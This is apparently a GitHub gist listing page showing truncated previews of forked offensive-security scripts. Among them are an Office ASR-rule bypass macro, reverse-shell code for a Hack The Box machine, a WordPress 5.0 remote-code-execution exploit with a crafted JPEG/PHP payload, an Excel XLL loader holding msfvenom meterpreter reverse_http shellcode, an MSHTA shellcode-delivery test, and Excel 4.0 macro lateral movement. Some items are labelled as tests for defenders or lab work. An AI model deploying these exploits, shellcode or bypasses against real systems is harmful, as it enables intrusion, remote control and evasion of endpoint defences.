This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <ole2.h> // OLE2 Definitions | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| HRESULT AutoWrap(int autoType, VARIANT *pvResult, IDispatch *pDisp, LPOLESTR ptName, int cArgs...) { | |
| va_list marker; | |
| va_start(marker, cArgs); | |
| if (!pDisp) { |
boh
/ ASR Rules Bypass.vba
Created
January 13, 2019 22:25
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
boh
/ MonitorMayhem.ps1
Created
January 15, 2019 20:22
— forked from M3T4L5T3F/MonitorMayhem.ps1
Monitor Mayhem - Test if users are likely to report a possible malfunction or compromise with physical symptoms
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # By @M3T4L5T3F | |
| # Change values to different experience. Works on laptops. Future update will add desktop monitor support | |
| $i=0 | |
| While ($true) | |
| { | |
| $i++ | |
| $brightness = Get-Random -Maximum 25 | |
| $delay = 0 |
boh
/ Get-KerberosKeytab.ps1
Created
February 17, 2019 07:21
— forked from 0xhexmex/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( | |
| [Parameter(Mandatory)] | |
| [string]$Path | |
| ) | |
| #Created by Pierre.Audonnet@microsoft.com | |
| # | |
| #Got keytab structure from http://www.ioplex.com/utilities/keytab.txt | |
| # | |
| # keytab { |
boh
/ Server.cs
Created
March 3, 2019 06:27
— forked from MinatoTW/Server.cs
Sample reverse shell code for HTB Giddy.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Net; | |
| using System.Net.Sockets; | |
| using System.Diagnostics; | |
| class Server { |
boh
/ wordpress-rce.js
Created
March 3, 2019 12:51
— forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var wpnonce = ''; | |
| var ajaxnonce = ''; | |
| var wp_attached_file = ''; | |
| var imgurl = ''; | |
| var postajaxdata = ''; | |
| var post_id = 0; | |
| var cmd = '<?php phpinfo();/*'; | |
| var cmdlen = cmd.length | |
| var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
| var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From the inside out, a minimalist backdoor. | |
| I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN. | |
| We will use in this example 3 tools. | |
| 1. Node | |
| 2. PowerShell | |
| 3. LocalTunnel | |
| While I have a full compact, custom version, I will not release this. |
boh
/ TestMSHTAShellcodeDelivery.ps1
Created
April 11, 2019 02:54
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
| To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
| #> | |
| <# | |
| Moving Credtis for CACTUSTORCH HERE | |
| I was in escape sequcence hell ;-) | |
| ' ( ) ( ) |
boh
/ shellcode_ExcelRegisterXLL.c
Created
April 11, 2019 03:22
— forked from Arno0x/shellcode_ExcelRegisterXLL.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll | |
| #include <Windows.h> | |
| __declspec(dllexport) void __cdecl xlAutoOpen(void); | |
| DWORD WINAPI ThreadFunction(LPVOID lpParameter) | |
| { | |
| // Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c" | |
| unsigned char b[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" |
boh
/ Invoke-ExShellcode.ps1
Created
May 11, 2019 04:57
— forked from Philts/Invoke-ExShellcode.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Lateral movement and shellcode injection via Excel 4.0 macros | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM | |
| #> | |
| function Invoke-ExShellcode | |
| { | |
| <# |